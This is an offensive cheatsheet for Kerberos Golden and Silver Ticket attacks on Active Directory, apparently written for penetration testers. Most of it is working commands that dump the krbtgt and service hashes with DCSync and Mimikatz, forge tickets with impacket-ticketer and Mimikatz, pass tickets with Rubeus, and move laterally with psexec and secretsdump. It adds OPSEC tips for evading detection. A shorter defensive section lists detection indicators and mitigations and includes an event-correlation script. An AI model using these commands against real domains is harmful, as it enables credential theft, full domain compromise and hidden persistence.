Kerberos Ticket Attacks Cheatsheet

Overview

Understanding Kerberos Ticket Attacks

Golden Tickets and Silver Tickets are forged Kerberos tickets that provide persistence and stealth:

  • Golden Ticket: Forged TGT (Ticket Granting Ticket) using the krbtgt hash
      • Valid for 10 years by default
      • Works for any service in the domain
      • Survives password changes (except krbtgt)

  • Silver Ticket: Forged service ticket (TGS ticket) using the service account hash
      • Valid for a specific service only
      • More stealthy (no DC communication)
      • Requires the target service hash

Prerequisites & Requirements

Required Information for Ticket Forging

Attack Type   | Required Data        | How to Obtain
--------------|----------------------|---------------------------------------
Golden Ticket | krbtgt NTLM hash     | DCSync, NTDS dump, Mimikatz on DC
Golden Ticket | Domain SID           | whoami /user, PowerView, lookupsid
Golden Ticket | Domain name          | Environment variable, AD enumeration
Silver Ticket | Service account hash | Kerberoasting, NTDS, local extraction
Silver Ticket | Domain SID           | Same as Golden Ticket
Silver Ticket | Target SPN           | Service enumeration, setspn -L

Golden Ticket Attacks

Obtaining Prerequisites

Get Domain SID

# Linux - Using lookupsid
impacket-lookupsid <domain>/<user>:'<password>'@<dc-ip> -domain-sids
# Look for: Domain SID is: S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX

# Linux - Using rpcclient
rpcclient -U '<domain>/<user>%<password>' <dc-ip> -c "lsaquery"

# Windows - PowerShell
whoami /user
# The domain SID is the user SID without its last segment (the RID)

# Windows - PowerView
Import-Module .\PowerView.ps1
Get-DomainSID

# Windows - Native AD Module
(Get-ADDomain).DomainSID.Value

Get krbtgt Hash

# Linux - DCSync
impacket-secretsdump -just-dc-user krbtgt <domain>/<user>:'<password>'@<dc-ip>

# Linux - NTDS dump
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

# Windows - Mimikatz DCSync
mimikatz.exe "lsadump::dcsync /domain:<domain> /user:krbtgt" exit

# Windows - From LSASS (on DC)
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit

Forging Golden Tickets

Linux - Golden Ticket Creation

# Create Golden Ticket (TGT)
impacket-ticketer \
    -nthash <krbtgt-ntlm-hash> \
    -domain-sid <domain-sid> \
    -domain <domain.local> \
    Administrator

# Full example with all options
impacket-ticketer \
    -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 \
    -domain-sid S-1-5-21-1870146311-1183348186-593267556 \
    -domain inlanefreight.local \
    -user-id 500 \
    -groups 512,513,514,515,516,517,518,519,520 \
    -duration 3650 \
    Administrator

# Output: Administrator.ccache

Windows - Golden Ticket Creation with Mimikatz

# Method 1: Create and inject into current session (PTT)
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<krbtgt-hash> /user:Administrator /ptt" exit

# Method 2: Create and save to file
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<krbtgt-hash> /user:Administrator /ticket:golden.kirbi" exit

# Full example with all parameters
mimikatz.exe "kerberos::golden /domain:inlanefreight.local /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:ff955e93a130f5bb1a6565f32b7dc127 /user:Administrator /id:500 /groups:512,513,514,515,516,517,518,519,520 /ptt" exit

# With AES keys (more stealthy)
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /aes256:<krbtgt-aes256> /user:Administrator /ptt" exit

Using Golden Tickets

Linux - Using Golden Tickets

# Set the ticket for use
export KRB5CCNAME=./Administrator.ccache

# Verify ticket
klist

# Access services
impacket-psexec -k -no-pass <target>.<domain>
impacket-smbclient -k -no-pass <target>.<domain>
impacket-wmiexec -k -no-pass <target>.<domain>
impacket-secretsdump -k -no-pass <target>.<domain>

# Access shares (native smbclient has no -no-pass; -N suppresses the password prompt)
smbclient //<target>.<domain>/C$ -k -N

# Note: Use FQDN for Kerberos auth (-k flag)

Windows - Using Golden Tickets

# Verify ticket injection
klist

# Access remote systems
dir \\<target>\c$

# PsExec with current ticket
PsExec.exe -accepteula \\<target> cmd

# Enter remote session
Enter-PSSession -ComputerName <target>

# Using Rubeus for ticket management
Rubeus.exe ptt /ticket:golden.kirbi

Silver Ticket Attacks

Understanding Silver Tickets

Silver Ticket Characteristics

  • Target specific services (CIFS, HOST, HTTP, MSSQL, etc.)
  • Don't touch the DC after creation (stealthier)
  • Limited to a single service on a single machine
  • Common services:
      • CIFS: File system access
      • HOST: WMI, PsExec, scheduled tasks
      • HTTP: Web services, PowerShell Remoting
      • LDAP: Directory queries
      • MSSQL: Database access

Forging Silver Tickets

Linux - Silver Ticket Creation

# Create Silver Ticket for specific service
impacket-ticketer \
    -nthash <service-account-hash> \
    -domain-sid <domain-sid> \
    -domain <domain.local> \
    -spn <service>/<target>.<domain> \
    Administrator

# Example: CIFS service (file access)
impacket-ticketer \
    -nthash 542780725df68d3456a0672f59001987 \
    -domain-sid S-1-5-21-1870146311-1183348186-593267556 \
    -domain inlanefreight.local \
    -spn cifs/sql01.inlanefreight.local \
    Administrator

# Example: Multiple services
# HOST for WMI/PsExec
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn host/<target> Administrator

# HTTP for PowerShell Remoting
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn http/<target> Administrator

Windows - Silver Ticket Creation with Mimikatz

# Create and inject Silver Ticket
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<service-hash> /user:Administrator /target:<target>.<domain> /service:<service> /ptt" exit

# Example: CIFS Silver Ticket
mimikatz.exe "kerberos::golden /domain:inlanefreight.local /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /user:Administrator /ptt" exit

# Create file for later use
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<service-hash> /target:<target> /service:<service> /user:Administrator /ticket:silver.kirbi" exit

# Multiple services in one ticket
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<domain-sid> /rc4:<computer-hash> /target:<target> /service:cifs,host /user:Administrator /ptt" exit

Pass-the-Ticket (PTT) Techniques

Extracting Existing Tickets

Windows - Ticket Extraction

# List all tickets in memory
Rubeus.exe triage

# Dump specific ticket by LUID
Rubeus.exe dump /luid:0x89275d /nowrap

# Dump specific service ticket
Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Export with Mimikatz
mimikatz.exe "sekurlsa::tickets /export" exit

# List current session tickets
klist

Linux - Ticket Extraction

# From ccache files
export KRB5CCNAME=/tmp/krb5cc_1000
klist

# Convert between formats
impacket-ticketConverter silver.kirbi silver.ccache
impacket-ticketConverter golden.ccache golden.kirbi

Using Extracted/Forged Tickets

Windows - Pass-the-Ticket

# Method 1: Rubeus PTT
Rubeus.exe ptt /ticket:<base64-ticket>
Rubeus.exe ptt /ticket:silver.kirbi

# Method 2: Mimikatz PTT
mimikatz.exe "kerberos::ptt silver.kirbi" exit

# Method 3: Rubeus with sacrificial process
Rubeus.exe createnetonly /program:cmd.exe /show
# Note the ProcessID and LUID
Rubeus.exe ptt /ticket:silver.kirbi /luid:0x798c2c

# Verify ticket loaded
klist

Linux - Pass-the-Ticket

# Set environment variable
export KRB5CCNAME=./Administrator.ccache

# Or specify full path
export KRB5CCNAME=/tmp/admin_ticket.ccache

# Use with Impacket tools
impacket-psexec -k -no-pass <target>
impacket-smbclient -k -no-pass <target>

# Use with native tools
smbclient -k //<target>/C$
rpcclient -k <target>

Sacrificial Processes

Critical: Avoiding Service Disruption

Never overwrite SYSTEM or service tickets! Always use sacrificial processes:

# Create sacrificial process with Rubeus
Rubeus.exe createnetonly /program:cmd.exe /show
# Output: ProcessID: 4960, LUID: 0x798c2c

# Pass ticket to specific LUID
Rubeus.exe ptt /ticket:ticket.kirbi /luid:0x798c2c

# Or with Mimikatz (creates new logon session)
mimikatz.exe "sekurlsa::pth /user:Administrator /domain:<domain> /rc4:<hash> /run:cmd.exe" exit

Common Attack Scenarios

Scenario 1: Domain Compromise with Golden Ticket

# 1. Get domain SID
impacket-lookupsid <domain>/<user>:'<password>'@<dc-ip> -domain-sids

# 2. DCSync for krbtgt
impacket-secretsdump -just-dc-user krbtgt <domain>/<user>:'<password>'@<dc-ip>

# 3. Create Golden Ticket
impacket-ticketer -nthash <krbtgt-hash> -domain-sid <sid> -domain <domain> Administrator

# 4. Use ticket
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass <dc>.<domain>

Scenario 2: Service-Specific Access with Silver Ticket

# 1. Get computer account hash (from local SAM/LSA)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# 2. Get domain SID
Get-DomainSID

# 3. Create Silver Ticket for CIFS
mimikatz.exe "kerberos::golden /domain:<domain> /sid:<sid> /rc4:<computer-hash> /target:<target> /service:cifs /user:Administrator /ptt" exit

# 4. Access file system
dir \\<target>\c$

Scenario 3: Ticket Renewal for Persistence

# Extract current TGT
Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Renew ticket (extends validity)
Rubeus.exe renew /ticket:<base64-ticket> /ptt

# Monitor ticket lifetime
Rubeus.exe triage

Quick Reference Matrix

Ticket Attack Decision Matrix

Attack Type     | Use Case           | Required Hash    | Stealth Level | Persistence
----------------|--------------------|------------------|---------------|------------
Golden Ticket   | Full domain access | krbtgt           | Medium        | 10 years
Silver Ticket   | Single service     | Service/Computer | High          | 7 days
Bronze Bit      | S4U2self abuse     | Service account  | High          | Session
Diamond Ticket  | TGT modification   | krbtgt           | Very High     | Variable
Sapphire Ticket | S4U2proxy chains   | Multiple         | High          | Session

OPSEC Considerations

Detection & Monitoring

Golden Ticket Indicators:

  • Event 4768 (TGT requested) is absent for the forged TGT, because it never passed through the KDC
  • Event 4769 (service ticket requested) appears with a TGT the KDC has no record of issuing
  • Tickets with a 10-year lifetime
  • Tickets for non-existent users
  • PAC validation failures

Silver Ticket Indicators:

  • Event 4769 absent (no TGS request ever reaches the DC)
  • Direct service access without a TGT
  • Service tickets with unusual properties

Mitigations:

  • Regular krbtgt password rotation (kills Golden Tickets; rotate twice, since the KDC still honors tickets issued under the previous key)
  • Service account password changes (kills Silver Tickets)
  • PAC validation enabled
  • Kerberos ticket anomaly detection
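The Golden Ticket indicators above, turned into a small correlation a defender can run over DC security events. This is an added example, not part of the cheatsheet: the event records are constructed and simplified (event ID, timestamp, account, client IP), and the account list stands in for a directory snapshot.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real event log data): (event_id, timestamp, account, client_ip).
# 4768 = TGT requested at the KDC; 4769 = service ticket requested at the KDC.
SAMPLE_EVENTS = [
    ("4768", "2024-05-01T08:00:00", "jsmith", "10.0.0.15"),
    ("4769", "2024-05-01T08:00:05", "jsmith", "10.0.0.15"),
    ("4769", "2024-05-01T09:12:00", "Administrator", "10.0.0.99"),  # never asked the KDC for a TGT
    ("4769", "2024-05-01T09:30:02", "ghost", "10.0.0.99"),          # account absent from AD
    ("4769", "2024-05-01T20:30:00", "jsmith", "10.0.0.15"),         # its TGT would have expired
]
KNOWN_ACCOUNTS = {"jsmith", "Administrator", "svc_sql"}  # constructed directory snapshot
MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket" policy


def find_golden_ticket_indicators(events, known_accounts, window=MAX_TGT_LIFETIME):
    """Return (account, client_ip, reason) tuples for 4769 events that look forged.

    A forged TGT never passes through the KDC, so a service-ticket request with
    no 4768 from the same account/client inside the TGT lifetime is suspicious,
    as is any request naming an account the directory does not know.
    Renewals (event 4770) are not modelled; a production version would extend
    last_tgt when one is seen.
    """
    findings = []
    last_tgt = {}  # (account, client_ip) -> time of the most recent 4768
    for event_id, ts, account, client_ip in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        key = (account, client_ip)
        if event_id == "4768":
            last_tgt[key] = when
        elif event_id == "4769":
            if account not in known_accounts:
                findings.append((account, client_ip, "unknown-account"))
            tgt_time = last_tgt.get(key)
            if tgt_time is None or when - tgt_time > window:
                findings.append((account, client_ip, "no-recent-tgt"))
    return findings


if __name__ == "__main__":
    for account, ip, reason in find_golden_ticket_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{reason:16} {account}@{ip}")
```

The 4768 and the later 4769 for one client are often logged on different domain controllers, so the correlation only works over events collected from every DC in the domain.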

Troubleshooting

Common Issues & Solutions

Issue                              | Solution
-----------------------------------|------------------------------------
"Clock skew too great"             | Sync time with DC: ntpdate <dc-ip>
"KDC_ERR_C_PRINCIPAL_UNKNOWN"      | Use FQDN, not IP
"KRB5KDC_ERR_PREAUTH_REQUIRED"     | Wrong hash or ticket expired
"Access Denied" with ticket        | Wrong service type in Silver Ticket
Ticket not working                 | Check LUID, use sacrificial process
"The ticket lifetime is too short" | Renew or recreate ticket

Best Practices

Engagement Guidelines

  1. Always use sacrificial processes to avoid service disruption
  2. Document all ticket creation for cleanup
  3. Monitor ticket lifetime and renew as needed
  4. Use Silver Tickets when possible (stealthier)
  5. Rotate between techniques to avoid pattern detection
  6. Clean up tickets after use: klist purge
  7. Test in lab first to understand behavior
  8. Use AES keys over RC4 when available (modern environments)